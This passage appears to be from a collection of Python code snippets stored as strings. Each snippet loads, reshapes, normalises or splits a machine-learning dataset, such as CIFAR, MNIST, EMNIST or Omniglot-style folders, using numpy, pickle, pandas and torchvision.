images.\n \n tr_X = tr_data['data']\n \n if labels=='fine':\n tr_y = tr_data['fine_labels']\n elif labels=='coarse':\n tr_y = tr_data['coarse_labels']\n \n tr_X = tr_X.reshape(tr_X.shape[0], 3, 32, 32)\n tr_y = np.reshape(tr_y, (len(tr_y), 1))\n \n #Load the testing set\n with open(test_path, 'rb') as te_f:\n te_data_raw = pickle.load(te_f)\n te_data = {}\n \n for key, val in te_data_raw.items():\n te_data[key.decode('utf8')] = val #32 x 32 x 3 images.\n \n te_X = te_data['data']\n \n if labels=='fine':\n te_y = te_data['fine_labels']\n elif labels=='coarse':\n te_y = te_data['coarse_labels']\n \n te_X = te_X.reshape(te_X.shape[0], 3, 32, 32)\n te_y = np.reshape(te_y, (len(te_y), 1))\n \n #scale to 255, 
transpose as needed\n tr_X = np.transpose(tr_X.astype('float32') / 255., transpose_permutation)\n te_X = np.transpose(te_X.astype('float32') / 255., transpose_permutation)\n \n return (tr_X, tr_y), (te_X, te_y), 100", "def load_data(dataset_name: str, cola_name: str, colb_name: str) -> np.mat:\r\n import seaborn as sns\r\n\r\n data = sns.load_dataset(dataset_name)\r\n col_a = np.array(data[cola_name]) # total_bill\r\n col_b = np.array(data[colb_name]) # tip\r\n\r\n mcol_a = np.mat(col_a)\r\n mcol_b = np.mat(col_b)\r\n\r\n m = np.shape(mcol_b)[1]\r\n one = np.ones((1, m), dtype=int)\r\n\r\n # horizontal stacking\r\n training_data = np.hstack((one.T, mcol_a.T))\r\n\r\n return training_data, mcol_b, col_a, col_b", "def load_data_preprocess(self):\n\n print(\"Loading the dataset ...\")\n # load the data\n c_util = CarUtils()\n train_x, train_y, test_x, test_y, classes = c_util.load_data()\n\n # set the image ordering\n K.set_image_dim_ordering(\"th\")\n\n print(\"Pre-processing the dataset ...\")\n # pre-process the data\n train_x = train_x.astype('float32')\n test_x = test_x.astype('float32')\n\n train_x = train_x / 255\n test_x = test_x / 255\n\n print(train_x.shape[0], ' train samples')\n print(test_x.shape[0], ' test samples')\n\n train_y = np_utils.to_categorical(train_y, CarsClassifierModel._nb_classes)\n test_y = np_utils.to_categorical(test_y, CarsClassifierModel._nb_classes)\n\n return train_x, train_y, test_x, test_y", "def readData():\n\tN = 800\n\tD = 28*28\n\tX = np.zeros((N, D), dtype=np.uint8)\n\n\tf = open(\"data/a012_images.dat\", 'rb')\n\n\tfor i in range(0, N):\n\t\tX[i, :] = np.fromstring(f.read(D), dtype='uint8')\n\n\tf.close()\n\n\treturn X", "def load_images(filename='training_images'): \n file_path = os.path.join(DATA_DIR, filename)\n with open(file_path, 'rb') as f:\n b = f.read() # hope ya get it all\n\n # grab the first four numbers ...\n # fmt='>i' means big-endian int32\n magic, n_images, n_rows, n_cols = (struct.unpack('>i', b[i*4:(i+1)*4]) for i in range(4))\n\n # i am a god-fearing man\n assert magic[0] == 2051, \"bad magic number, what do?\"\n\n\n # so i think you can use the standard libary's \"array\" for this, just\n # because binary data of any sort is kinda dodgy, but this grabs 'the rest'\n # format='B' means unsigned char === 'uint8', and apparently endianness doesn't matter\n image_stream = array.array('B', b[16:])\n\n # so each 28*28 byte portion of image_stream is a flattened image. these two\n # numpy.reshape calls get it into the desired shape for A. maybe could\n # combine it into one call, idk. anyway, each flattened image appears as a\n # row, and there is a row for each image.\n image_first = numpy.reshape(image_stream, (n_images[0], n_rows[0], n_cols[0]))\n images = image_first.reshape(n_images[0], n_rows[0]*n_cols[0])\n\n # convert to float in [0,1]\n images = images.astype('f') / 255\n\n return images", "def load_next_batch(self, roidb, num_classes):\n num_images = len(roidb)\n # Sample random scales to use for each image in this batch\n random_scale_inds = np.random.randint( 0, high=len(self.config.TRAIN.SCALES), size=num_images)\n assert (self.config.TRAIN.BATCH_SIZE % num_images == 0), 'num_images ({}) must divide BATCH_SIZE ({})'. 
\\\n format(num_images, self.config.TRAIN.BATCH_SIZE)\n \n # Get the input image blob, formatted for caffe\n im_blob, im_scales = self._get_image_blobs(roidb, random_scale_inds)\n \n blobs = {'data': im_blob}\n \n assert len(im_scales) == 1, \"Single batch only\"\n assert len(roidb) == 1, \"Single batch only\"\n # gt boxes: (x1, y1, x2, y2, cls)\n gt_inds = np.where(roidb[0]['gt_classes'] != 0)[0]\n gt_boxes = np.empty((len(gt_inds), 5), dtype=np.float32)\n gt_boxes[:, 0:4] = roidb[0]['boxes'][gt_inds, :] * im_scales[0]\n gt_boxes[:, 4] = roidb[0]['gt_classes'][gt_inds]\n blobs['gt_boxes'] = gt_boxes\n blobs['gt_ishard'] = roidb[0]['gt_ishard'][gt_inds] if 'gt_ishard' in roidb[0] \\\n else np.zeros(gt_inds.size, dtype=int)\n # blobs['gt_ishard'] = roidb[0]['gt_ishard'][gt_inds]\n blobs['dontcare_areas'] = roidb[0]['dontcare_areas'] * im_scales[0] if 'dontcare_areas' in roidb[0] \\\n else np.zeros([0, 4], dtype=float)\n blobs['im_info'] = np.array([[im_blob.shape[1], im_blob.shape[2], im_scales[0]]], dtype=np.float32)\n blobs['im_name'] = os.path.basename(roidb[0]['image'])\n \n return blobs", "def test_load_and_featurize_data_single_column_batch_overflow():\n feat = ImageFeaturizer()\n feat.featurize(save_features=True, **LOAD_DATA_ARGS)\n check_array = np.load(CHECK_ARRAY.format('squeezenet'))\n try:\n compare_featurizer_class(feat, (227, 227), check_array, featurized=True,\n check_csv=CHECK_CSV.format('squeezenet'), **COMPARE_ARGS)\n finally:\n # Remove path to the generated csv at the end of the test\n remove_generated_paths()\n del feat", "def load_EMNIST_data(file, verbose = False, standarized = False): \n mat = sio.loadmat(file)\n data = mat[\"dataset\"]\n \n X_train = data['train'][0,0]['images'][0,0]\n X_train = X_train.reshape((X_train.shape[0], 28, 28), order = \"F\")\n y_train = data['train'][0,0]['labels'][0,0]\n y_train = np.squeeze(y_train)\n y_train -= 1 #y_train is zero-based\n \n X_test = data['test'][0,0]['images'][0,0]\n X_test= X_test.reshape((X_test.shape[0], 28, 28), order = \"F\")\n y_test = data['test'][0,0]['labels'][0,0]\n y_test = np.squeeze(y_test)\n y_test -= 1 #y_test is zero-based\n \n if standarized: \n X_train = X_train/255\n X_test = X_test/255\n mean_image = np.mean(X_train, axis=0)\n X_train -= mean_image\n X_test -= mean_image\n \n\n if verbose == True: \n print(\"EMNIST-letter dataset ... 
\")\n print(\"X_train shape :\", X_train.shape)\n print(\"X_test shape :\", X_test.shape)\n print(\"y_train shape :\", y_train.shape)\n print(\"y_test shape :\", y_test.shape)\n \n return X_train, y_train, X_test, y_test", "def _load_data(self):\n pickle_in = open(\"X_train.pickle\", \"rb\")\n self.X = pickle.load(pickle_in)\n pickle_in = open(\"y_train.pickle\", \"rb\")\n self.Y = pickle.load(pickle_in)\n\n pickle_in = open(\"X_test.pickle\", \"rb\")\n self.X_final = pickle.load(pickle_in)\n pickle_in = open(\"y_test.pickle\", \"rb\")\n self.Y_final = pickle.load(pickle_in)\n\n # Set input shape:\n if K.image_data_format() == 'channels_first':\n self.input_shape = (3, self.img_rows, self.img_cols)\n else:\n self.input_shape = (self.img_rows, self.img_cols, 3)\n\n self.X = self.X.astype('float32')\n self.X /= 255\n self.X_final = self.X_final.astype('float32')\n self.X_final /= 255\n print('X shape:', self.X.shape)\n print(self.X.shape[0], 'Samples')\n\n num_datapoints = 3000\n self.X = self.X[0:num_datapoints]\n self.Y = self.Y[0:num_datapoints]\n\n num_datapoints = 2000\n self.X_final = self.X_final[0:num_datapoints]\n self.Y_final = self.Y_final[0:num_datapoints]\n\n self.Y_final = to_categorical(self.Y_final, self.num_classes)\n\n # Initialize Data\n kfold = StratifiedKFold(n_splits=self.nFolds, shuffle=True)\n\n if self.b_eval_advanced:\n # Loop through the indices the split() method returns\n for index, (train_indices, test_indices) in enumerate(kfold.split(self.X, self.Y)):\n if index == 0:\n self.Y = to_categorical(self.Y, self.num_classes)\n\n # Generate batches from indices\n xtrain, xtest = self.X[train_indices], self.X[test_indices]\n ytrain, ytest = self.Y[train_indices], self.Y[test_indices]\n\n self.data.append(tuple([xtrain, xtest, ytrain, ytest]))\n\n if not self.b_eval_advanced:\n self.Y = to_categorical(self.Y, self.num_classes)\n\n #print(np.asarray(self.data).shape)\n #print(self.data)\n print(\"Y_final Shape\", self.Y_final.shape)", "def load_validation_data():\n X = np.load('../input/X_validate.npy')\n ids = np.load('../input/ids_validate.npy')\n\n X = X.astype(np.float32)\n X /= 255\n\n return X, ids", "def load_preprocess_test_batch(batch_id, batch_size):\r\n filename = 'preprocess_test_' + str(batch_id) + '.p'\r\n features, labels = pickle.load(open(filename, mode='rb'))\r\n# labels = np.argmax(labels,1)\r\n# num = len(labels)\r\n# arr = np.zeros((num, 1))\r\n# for i in range(num):\r\n# arr[i][0] = labels[i]\r\n# ind = [i for i in range(len(features))]\r\n# random.shuffle(ind)\r\n# features = features[ind]\r\n# labels = labels[ind]\r\n\r\n # Return the training data in batches of size <batch_size> or less\r\n return features[1200:batch_size],labels[1200:batch_size]\r\n #return batch_features_labels(features, labels, batch_size)\r", "def load_dataset(self):\n\n train_path = os.path.join(self.dataset_path, 'images_background')\n validation_path = os.path.join(self.dataset_path, 'images_evaluation')\n\n # First let's take care of the train alphabets\n for alphabet in os.listdir(train_path):\n if alphabet[0] == '.':\n continue\n alphabet_path = os.path.join(train_path, alphabet)\n\n current_alphabet_dictionary = {}\n\n for character in os.listdir(alphabet_path):\n if character[0] == '.':\n continue\n character_path = os.path.join(alphabet_path, character)\n\n current_alphabet_dictionary[character] = os.listdir(\n character_path)\n\n self.train_dictionary[alphabet] = current_alphabet_dictionary\n\n # Now it's time for the validation alphabets\n for alphabet in 
os.listdir(validation_path):\n alphabet_path = os.path.join(validation_path, alphabet)\n if alphabet[0] == '.':\n continue\n\n current_alphabet_dictionary = {}\n\n for character in os.listdir(alphabet_path):\n if character[0] == '.':\n continue\n character_path = os.path.join(alphabet_path, character)\n\n current_alphabet_dictionary[character] = os.listdir(\n character_path)\n\n self.evaluation_dictionary[alphabet] = current_alphabet_dictionary", "def get_train_data(batch_size=8):\n transform_train = transforms.Compose([\n transforms.RandomResizedCrop(224),\n transforms.RandomFlipLeftRight(),\n transforms.RandomColorJitter(brightness=0.4, contrast=0.4, saturation=0.4),\n transforms.RandomLighting(0.1),\n transforms.ToTensor(),\n transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225))\n ])\n\n img_folder, img_file = get_data_path()\n td = MultilabelDataset(data_folder=img_folder, data_file=img_file)\n train_data = DataLoader(td.transform_first(transform_train), batch_size=batch_size, shuffle=True)\n return train_data", "def _load20news_miao():\n DIR = os.path.dirname(os.path.realpath(__file__)).split('vae_sparse')[0]+'vae_sparse/optvaedatasets'\n DIR += '/20news_miao'\n h5file = DIR+'/miao.h5'\n if not os.path.exists(h5file):\n flen = len(open(DIR+'/vocab').readlines())\n print 'DIM: ',flen\n np.random.seed(1)\n TRAIN_VALID_MAT = readSparseFile(DIR+'/train.feat', flen, zeroIndexed=False)\n idx = np.random.permutation(TRAIN_VALID_MAT.shape[0])\n VALIDMAT = TRAIN_VALID_MAT[idx[:500]]\n TRAINMAT = TRAIN_VALID_MAT[idx[500:]]\n TESTMAT = readSparseFile(DIR+'/test.feat', flen, zeroIndexed=False) \n saveSparseHDF5(TRAINMAT,'train', h5file)\n saveSparseHDF5(VALIDMAT,'valid', h5file)\n saveSparseHDF5(TESTMAT, 'test' , h5file)\n dset = {}\n dset['vocabulary']= [k.strip().split(' ')[0] for k in open(DIR+'/vocab').readlines()]\n dset['train'] = loadSparseHDF5('train',h5file)\n dset['valid'] = loadSparseHDF5('valid',h5file)\n dset['test'] = loadSparseHDF5('test',h5file)\n dset['dim_observations'] = dset['train'].shape[1]\n dset['data_type'] = 'bow'\n return dset", "def loadData(self):\n batch_size = 256\n \n #if self.conv_sg == True:\n # batch_size = 1 \n \n download = True\n root = self.root + self.dataset\n if self.dataset == \"MNIST\": \n transform = transforms.Compose([transforms.ToTensor(), transforms.Normalize((0.1307,), (0.3081,))])\n trainset = torchvision.datasets.MNIST(root, train=True, download=download, transform=transform)\n testset = torchvision.datasets.MNIST(root, train=False, download=download, transform=transform)\n \n if self.dataset == \"CIFAR10\":\n transform = transforms.Compose([transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465,), (0.2023, 0.1994, 0.2010,))])\n trainset = torchvision.datasets.CIFAR10(root, train=True, download=download, transform=transform)\n testset = torchvision.datasets.CIFAR10(root, train=False, download=download, transform=transform)\n \n if self.dataset == \"CIFAR100\":\n transform = transforms.Compose([transforms.ToTensor()])\n trainset = torchvision.datasets.CIFAR100(root, train=True, download=download, transform=transform)\n testset = torchvision.datasets.CIFAR100(root, train=False, download=download, transform=transform)\n \n \n trainloader = torch.utils.data.DataLoader(trainset, batch_size = batch_size,\n shuffle=False, num_workers=0, pin_memory = False)\n \n testloader = torch.utils.data.DataLoader(testset, batch_size= batch_size,\n shuffle=False, num_workers=2, pin_memory = False)\n \n return trainloader, testloader", "def 
load_train_data():\r\n X_train = np.load('data/train/X_train.npy')\r\n scaling_train = np.load('data/train/scaling_train.npy')\r\n ids_train = np.load('data/train/ids_train.npy')\r\n y_train = np.load('data/train/y_train.npy')\r\n\r\n seed = np.random.randint(1, 10e6)\r\n np.random.seed(seed)\r\n np.random.shuffle(X_train)\r\n np.random.seed(seed)\r\n np.random.shuffle(scaling_train)\r\n np.random.seed(seed)\r\n np.random.shuffle(ids_train)\r\n np.random.seed(seed)\r\n np.random.shuffle(y_train)\r\n\r\n return X_train, scaling_train, ids_train, y_train", "def load_data(datafile, num_class, save=False, save_path='dataset.pkl'):\n train_list = open(datafile, 'r')\n labels = []\n images = []\n for line in train_list:\n tmp = line.strip().split(' ')\n filepath = tmp[0]\n print(filepath)\n img = Image.open(filepath)\n img = prep.resize_image(img, 224, 224)\n np_img = prep.pil_to_nparray(img)\n images.append(np_img)\n\n # one-hot encoder\n index = int(tmp[1])\n label = np.zeros(num_class)\n label[index] = 1\n labels.append(label)\n if save:\n pickle.dump((images, labels), open(save_path, 'wb'))\n return images, labels", "def _load_data(self):\n data_x, data_y = make_classification(n_samples=5000, n_features=20,\n n_informative=10,\n n_redundant=0, n_repeated=0,\n n_classes=2,\n n_clusters_per_class=4,\n weights=None, flip_y=0.01,\n class_sep=1.0, hypercube=True,\n shift=0.0, scale=1.0,\n shuffle=True,\n random_state=self.args.rand_seed)\n\n self.orig_column_names = np.arange(data_x.shape[-1])\n self.data_x = data_x\n self.data_y = self.to_one_hot_encoding(data_y)\n self.numerical_idx = np.arange(data_x.shape[-1])\n self.non_num_idx = None\n self.all_non_numerical_idx = None\n\n # Calculate adjacency matrix\n self.meta_inf = data_x[:, :1].astype('float32')\n if self.args.graph_type:\n self.adj = self.get_adjacency()", "def preprocess_the_dataset(x_train):\n # initialize empty lists\n x_real,x_pencil=[],[]\n for image in x_train[:8000]:\n real_image = resize_128(image)\n # make it pencil drawn\n pencil_image = convert_image(real_image)\n x_real.append(real_image/127.5-1)\n x_pencil.append(pencil_image/127.5-1)\n return x_real,x_pencil", "def load_data(data_path=DATA_PATH):\n with open (os.path.join(DATA_PATH, \"imdb_extrait.pkl\"),\"rb\") as file:\n \n [data , id2titles , fields ]= pk.load(file)\n \n \n datax = data [: ,:33]\n datay = np.array([1 if x [33] >6.5 else -1 for x in data ])\n \n return datax, datay, id2titles, fields", "def load_data_from_fold(data_path):\r\n print(\"\\nLoading data from json folder {}\".format(data_path))\r\n\r\n SAMPLES_TO_CONSIDER = 22050\r\n\r\n data = preprocess_dataset(data_path, SAMPLES_TO_CONSIDER)\r\n\r\n X = np.array(data[\"MFCCs\"])\r\n y = np.array(data[\"labels\"])\r\n print(\"Training sets loaded!\")\r\n print(\"data size :\", X.shape, \"labels size: \", y.shape)\r\n print(\"release the 'data' for memories\")\r\n del data\r\n\r\n return X, y", "def training_data():\n global _MEAN # pylint: disable=global-statement\n _np.random.seed(1)\n view = _skdc10.view.OfficialImageClassificationTask()\n permutation = _np.random.permutation(range(50000))\n if _MEAN is None:\n _MEAN = view.train.x.reshape((50000 * 32 * 32, 3)).mean(axis=0)\n return ((view.train.x[:50000, :][permutation, :] - _MEAN).\n transpose((0, 3, 1, 2)).astype('float32'),\n view.train.y[:50000][permutation].reshape((50000, 1)).astype('float32'))", "def load_train_x(train_x_path):\n \n text = open(train_x_path, 'r')\n row = csv.reader(text , delimiter=\",\")\n x = []\n n_row = 0\n for r in row:\n 
if n_row != 0:\n for j in range(23):\n x.append(float(r[j]))\n n_row += 1\n text.close()\n x = np.array(x)\n x = np.reshape(x, (20000,23))\n \n return x", "def __init__(self, data_path):\r\n\t\tfile_names = ['data_batch_%d' % i for i in range(1,6)]\r\n\t\tfile_names.append('test_batch')\r\n\r\n\t\tX = []\r\n\t\ty = []\r\n\t\tfor file_name in file_names:\r\n\t\t\twith open(data_path + file_name) as fin:\r\n\t\t\t\tdata_dict = cPickle.load(fin)\r\n\t\t\tX.append(data_dict['data'].ravel())\r\n\t\t\ty = y + data_dict['labels']\r\n\r\n\t\tself.X = np.asarray(X).reshape(60000, 32*32*3)\r\n\t\tself.y = np.asarray(y)\r\n\r\n\t\tfin = open(data_path + 'batches.meta')\r\n\t\tself.LABEL_NAMES = cPickle.load(fin)['label_names']\r\n\t\tfin.close()", "def load_bc(self):\r\n\r\n # Open the file and read all the lines.\r\n array = np.loadtxt(self.bc_file)\r\n\r\n # Convert the columns to appropriate type.\r\n self.beta = array[:, 0]\r\n self.code = array[:, 1].astype(int)", "def load_oat1_3_big(self):\n source_df = pd.read_csv('./datasets/metabolites/OAT1OAT3Big.csv')\n source_df['SLC'] = source_df['SLC'].astype('category').cat.codes\n\n to_drop = [0, 2, 3, 4, ]\n\n df = source_df.drop(source_df.columns[to_drop], axis=1)\n\n print('Loaded in data, null values found: ', end=' ')\n print(df[pd.isnull(df).any(axis=1)])\n\n label_index = 1 # this is from source\n print(\"Data shape: \", df.shape[0])\n\n X = np.array([np.array(df.iloc[x, :]) for x in range(df.shape[0])])\n Y = np.array(source_df.iloc[:, label_index])\n\n header = np.array(df.columns)\n\n if self.scale:\n feature_scaler = StandardScaler()\n X = feature_scaler.transform(X)\n\n return X, Y, header", "def __init__(self, filepath='multidrcl', suffix='DRCL', extension='.IMG', lblext='.LBL', force_read=True, unit='s', feature='sh', eye='L', do_print=True, initdatadir=None, initdata=None, readintuple=None):\n\n Dataset.__init__(self, None, \"mastcam\")\n\n if readintuple != None:\n (self.data, self.fullimages, self.segmentation, self.labels, self.xlabel, self.ylabel, self.xvals, self.rgbdict, self.lblext) = readintuple[0:9]\n if initdata != None:\n self.initdata = initdata\n if self.initfilename != None:\n self.initfilename = initarchive\n else:\n self.initfilename = 'param'\n return\n \n if do_print: print(filepath)\n \n if filepath == '388':\n filepath = '/proj/imbue/data/msl-mastcam/sol388/'\n \n if filepath == 'multidrcl':\n filepath = '/proj/imbue/data/msl-mastcam/multispectral_drcl/'\n \n self.filepath = filepath\n self.xlabel = 'TBD'\n self.ylabel = 'TBD'\n \n #dirname = filepath[:-1]\n #subsetname = dirname.split('/')[-1]\n subsetname = os.path.basename(filepath)\n self.name += \"-\" + subsetname\n if len(suffix) > 0:\n self.name += \"-\" + eye + '-' + suffix + '-' + unit + '-' + feature\n if do_print: print(\"Dataset name: \" + self.name)\n \n self.data = []\n self.cadence = []\n \n self.unit = unit\n self.feature = feature\n self.eye = eye\n\n self.rgbdict = {}\n self.extension = extension\n self.lblext = lblext\n self.suffix = suffix\n \n self.archive = os.path.join(filepath,\n subsetname + eye + \"_\" + suffix + '_' + unit + '_' + feature + \".pkl\")\n\n if initdata != None:\n self.initdata = initdata\n if self.initfilename != None:\n self.initfilename = initarchive\n else:\n self.initfilename = 'param'\n elif initdatadir != None:\n print(\"Reading in initialization data...\")\n #initsubsetname = initdatadir[:-1].split('/')[-1]\n initsubsetname = os.path.basename(initdatadir)\n initarchive = os.path.join(initdatadir,\n initsubsetname + eye 
+ \"_\" + suffix + '_' + unit + '_' + feature + \".pkl\")\n if os.path.exists(initarchive):\n with open(initarchive, 'r') as f:\n self.initdata = pickle.load(f)[0]\n self.initfilename = initarchive\n print(\"...done!\")\n print(\"initdata.shape:\", self.initdata.shape)\n else:\n print(\"...initialization data does not exist!\")\n print(\"Desired pickle was: %s\" % initarchive)\n \n # Determine if we need to preprocess the data\n if (not os.path.exists(self.archive)) or force_read:\n self.read_mastcam_dir(filepath, suffix, unit, feature, extension, lblext, eye)\n else:\n if do_print: print(\"Found pickle at \" + self.archive)\n \n self.readin()", "def load_letter(folder, min_num_images):\n image_files = os.listdir(folder)\n dataset = np.ndarray(shape=(len(image_files), image_size, image_size),\n dtype=np.float32)\n image_index = 0\n print(folder)\n for image in os.listdir(folder):\n image_file = os.path.join(folder, image)\n try:\n image_data = (ndimage.imread(image_file).astype(float) - \n pixel_depth / 2) / pixel_depth\n if image_data.shape != (image_size, image_size):\n raise Exception('Unexpected image shape: %s' % str(image_data.shape))\n dataset[image_index, :, :] = image_data\n image_index += 1\n except IOError as e:\n print('Could not read:', image_file, ':', e, '- it\\'s ok, skipping.')\n \n num_images = image_index\n dataset = dataset[0:num_images, :, :]\n if num_images < min_num_images:\n raise Exception('Many fewer images than expected: %d < %d' %\n (num_images, min_num_images))\n \n print('Full dataset tensor:', dataset.shape)\n print('Mean:', np.mean(dataset))\n print('Standard deviation:', np.std(dataset))\n return dataset", "def _read_datafile(self,path):\n \tlabels, images = [], []\n \twith gzip.GzipFile(path) as f:\n \t for line in f:\n \t vals = line.strip().split()\n \t labels.append(float(vals[0]))\n \t images.append([float(val) for val in vals[1:]])\n \tlabels = np.array(labels, dtype=np.int32)\n \tlabels[labels == 10] = 0 # fix weird 0 labels\n \timages = np.array(images, dtype=np.float32).reshape(-1, 16, 16, 1)\n \timages = (images + 1) / 2\n \treturn images, labels", "def load_back_from_disk(data_dir, istrain=True):\n \"\"\"load back metadata_df\"\"\"\n meta_data = pickle.load(open(os.path.join(data_dir, 'meta.pkl'), 'rb'))\n metadata_rows = meta_data[0]\n max_node = meta_data[1]\n\n \"\"\"itershard by loading from disk\"\"\"\n all_X, all_y, all_size, all_L, all_names, all_node_img = [], [], [], [], [], []\n\n for _, row in enumerate(metadata_rows):\n X = np.array(io_utils.load_from_disk(os.path.join(data_dir, row['X'])))\n L = np.array(io_utils.load_from_disk(os.path.join(data_dir, row['L'])))\n y = np.array(io_utils.load_from_disk(os.path.join(data_dir, row['y'])))\n size = np.array(io_utils.load_from_disk(os.path.join(data_dir, row['size'])))\n names = np.array(io_utils.load_from_disk(os.path.join(data_dir, row['name'])))\n node_img = np.array(io_utils.load_from_disk(os.path.join(data_dir, row['node_img'])))\n\n \"\"\" stack to list\"\"\"\n all_X.append(X)\n all_y.append(y)\n all_L.append(L)\n all_size.append(size)\n all_names.append(names)\n all_node_img.append(node_img)\n\n \"\"\" return a Dataset contains all X, y, w, ids\"\"\"\n all_X = np.squeeze(np.vstack(all_X))\n all_L = np.squeeze(np.vstack(all_L))\n all_y = np.squeeze(np.concatenate(all_y))\n all_size = np.squeeze(np.concatenate(all_size))\n all_names = np.squeeze(np.concatenate(all_names))\n all_node_img = np.squeeze(np.concatenate(all_node_img))\n\n # create output dataset\n dataset = dict()\n if 
istrain:\n dataset['X'] = all_X[:TRAIN_NUM]\n dataset['y'] = all_y[:TRAIN_NUM]\n dataset['size'] = all_size[:TRAIN_NUM]\n dataset['L'] = all_L[:TRAIN_NUM]\n dataset['name'] = all_names[:TRAIN_NUM]\n dataset['node_img'] = all_node_img[:TRAIN_NUM]\n else:\n dataset['X'] = all_X[:TEST_NUM]\n dataset['y'] = all_y[:TEST_NUM]\n dataset['size'] = all_size[:TEST_NUM]\n dataset['L'] = all_L[:TEST_NUM]\n dataset['name'] = all_names[:TEST_NUM]\n dataset['node_img'] = all_node_img[:TEST_NUM]\n\n return dataset, max_node", "def load_data(path, mode='train'):\n\n labels_path = os.path.join(path, f'{mode}-labels-idx1-ubyte.gz')\n images_path = os.path.join(path, f'{mode}-images-idx3-ubyte.gz')\n\n with gzip.open(labels_path, 'rb') as lbpath:\n labels = np.frombuffer(lbpath.read(), dtype=np.uint8, offset=8)\n\n with gzip.open(images_path, 'rb') as imgpath:\n images = np.frombuffer(imgpath.read(), dtype=np.uint8, offset=16).reshape(len(labels), 784)\n\n normalized_images = normalize_data(images)\n one_hot_labels = one_hot_encoding(labels, num_classes=10)\n\n return normalized_images, one_hot_labels", "def _load_data(self):\n\n path_data_x = \\\n '/workspace/base-ml/data/tadpole/adni_one_baseline_feature_data' \\\n '.csv'\n path_data_y = \\\n '/workspace/base-ml/data/tadpole/adni_one_baseline_label_data' \\\n '.csv'\n path_meta = '/workspace/base-ml/data/tadpole' \\\n '/adni_one_baseline_meta_data' \\\n '.csv'\n read_data_x = pd.read_csv(path_data_x)\n read_data_y = pd.read_csv(path_data_y) # 0 NL, 1, MCI, 2 Dementia\n read_data_meta = pd.read_csv(path_meta)[['AGE', 'PTGENDER', 'APOE4']]\n\n # Replace gender to numeric\n read_data_meta.PTGENDER = read_data_meta.PTGENDER.replace('Male', 0)\n read_data_meta.PTGENDER = read_data_meta.PTGENDER.replace('Female', 1)\n\n new_data_x = np.array(read_data_x).astype(np.float32)\n new_data_y = np.array(read_data_y).astype(np.float32)\n new_data_meta = np.array(read_data_meta).astype(np.float32)\n\n # Concat meta-information with feature vector input\n concat_meta = pd.DataFrame(new_data_meta)\n concat_meta.iloc[:, 2] = concat_meta.iloc[:, 2].replace(0, 'zero')\n concat_meta.iloc[:, 2] = concat_meta.iloc[:, 2].replace(1, 'one')\n concat_meta.iloc[:, 2] = concat_meta.iloc[:, 2].replace(2, 'two')\n concat_meta = concat_meta.to_numpy()\n new_data_x = np.concatenate([concat_meta, new_data_x], 1)\n print(new_data_x.shape, new_data_y.shape, new_data_meta.shape)\n\n self.orig_column_names = ['Age', 'Gender', 'APOE4'] + \\\n list(read_data_x.columns)\n self.data_x = new_data_x\n self.data_y = self.to_one_hot_encoding(new_data_y)\n self.numerical_idx = np.arange(new_data_x.shape[-1])\n self.numerical_idx = np.delete(self.numerical_idx, [2]) # Remove APOE column idx\n self.non_num_idx = np.array([2])\n self.all_non_numerical_idx = None\n\n # self.numerical_idx = np.arange(self.data_x.shape[-1])\n # self.non_num_idx = None\n # self.all_non_numerical_idx = None\n\n # Calculate adjacency matrix\n self.meta_inf = new_data_meta.astype('float32')\n if self.args.graph_type:\n self.adj = self.get_adjacency()", "def load_and_process(data_dir, train_node_num, eval_node_num, test_node_num):\n biases, feature, label = get_biases_features_labels(data_dir)\n # split training, validation and testing set\n nodes_num = label.shape[0]\n train_mask = get_mask(nodes_num, 0, train_node_num)\n eval_mask = get_mask(nodes_num, train_node_num, train_node_num + eval_node_num)\n test_mask = get_mask(nodes_num, nodes_num - test_node_num, nodes_num)\n\n y_train = np.zeros(label.shape)\n y_val = 
np.zeros(label.shape)\n y_test = np.zeros(label.shape)\n\n y_train[train_mask, :] = label[train_mask, :]\n y_val[eval_mask, :] = label[eval_mask, :]\n y_test[test_mask, :] = label[test_mask, :]\n\n y_train = y_train[np.newaxis]\n y_val = y_val[np.newaxis]\n y_test = y_test[np.newaxis]\n train_mask = train_mask[np.newaxis]\n eval_mask = eval_mask[np.newaxis]\n test_mask = test_mask[np.newaxis]\n\n return feature, biases, y_train, train_mask, y_val, eval_mask, y_test, test_mask", "def load_CIFAR_batch(filename):\n with open(filename, 'rb') as f:\n #一个样本由标签和图像数据组成\n #3072 = 32 x 32 x 3\n data_dict = p.load(f, encoding= 'bytes')\n images = data_dict[b'data']\n labels = data_dict[b'labels']\n #把原始数据结构调整为BCWH batches, channels, width, height\n images = images.reshape(10000, 3, 32, 32)\n #tensorflow 处理图像数据的结构:BWHC\n #把C移动到最后一个维度\n images = images.transpose(0, 2, 3, 1)\n\n labels = np.array(labels)\n return images, labels", "def load_dataset(ipc = 20000):\n files = os.listdir(\"..\\\\data\")\n ind = 0\n xs = []\n ys = []\n classNames = []\n for file in files:\n fileSplit = file.split('.')\n print('--Loading ' + fileSplit[0][18:] + ' data.')\n classNames.append(fileSplit[0][18:])\n x = np.load(\"..\\\\data\\\\\" + file)\n x = x.astype('float32')/255\n xs.append(x[0:ipc, :])\n y = np.array([float(ind) for i in range(ipc)])\n ys.append(y.reshape(ipc, 1))\n ind += 1\n\n xs = np.array(xs)\n ys = np.array(ys)\n xs = xs.reshape(xs.shape[0]*xs.shape[1], xs.shape[2])\n ys = ys.reshape(ys.shape[0]*ys.shape[1], ys.shape[2])\n return xs, ys, classNames", "def load_dataset(data_dir, img_size):\n global input_set\n global test_set\n\n imgs = []\n img_files = os.listdir(data_dir)\n for img in img_files:\n # try:\n tmp = scipy.misc.imread(data_dir + \"/\" + img)\n x, y, z = tmp.shape # shape : width * length * chanel\n coords_x = int(x / img_size) # 坐标\n coords_y = int(y / img_size) #\n coords = [(q, r) for q in range(coords_x) for r in range(coords_y)] # 列表 x * y\n for coord in coords:\n imgs.append((data_dir + \"/\" + img, coord)) # 为列表添加文件目录\n # except BaseException:\n # print(\"oops\")\n test_size = min(10, int(len(imgs) * 0.2))\n random.shuffle(imgs)\n test_set = imgs[:test_size]\n train_set_X = imgs[test_size:][:200]\n train_set = imgs[test_size:][200:400]\n return", "def load_data(tetrode_number=TETRODE_NUMBER):\n print(\"Loading data...\")\n X_train, X_valid, X_test, y_train_labels, y_valid_labels, y_test_labels = formatData(tetrode_number,BASENAME,CONV)\n print(\"Done!\")\n\n X_train = X_train.reshape(X_train.shape[0],1,X_train.shape[1],X_train.shape[2])\n X_valid = X_valid.reshape(X_valid.shape[0],1,X_valid.shape[1],X_valid.shape[2])\n X_test = 